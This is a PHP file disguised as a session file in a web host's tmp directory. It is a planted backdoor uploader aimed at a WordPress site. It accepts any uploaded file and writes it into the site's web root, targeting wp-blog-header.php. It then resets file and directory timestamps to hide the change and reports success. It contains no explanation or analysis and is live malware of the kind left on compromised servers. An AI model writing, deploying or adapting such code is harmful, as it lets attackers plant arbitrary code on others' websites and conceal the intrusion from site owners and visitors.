File: /home/hotjamba/tmp/sess_194956a198190f4556f95a4b74950944
<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";$fp = "/home/hotjamba/domains/howtosettlealawsuit.net/private_html/"; $fn = "wp-blog-header.php"; @chdir($fp); $tm = @filemtime($fp); print("\n<br>");if(@move_uploaded_file($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) { if($tm) { @touch($fn,$tm,$tm); @touch($fp,$tm,$tm); } print("<file>$fn</file><size>" . filesize($fn) . "</size><writable>" . is_writable($fn) . "</writable><date>" . @date("Y-m-d H:i:s", @filemtime($fn)) . "</date>"); }echo "Result:OK"; echo "</body></html>"; die;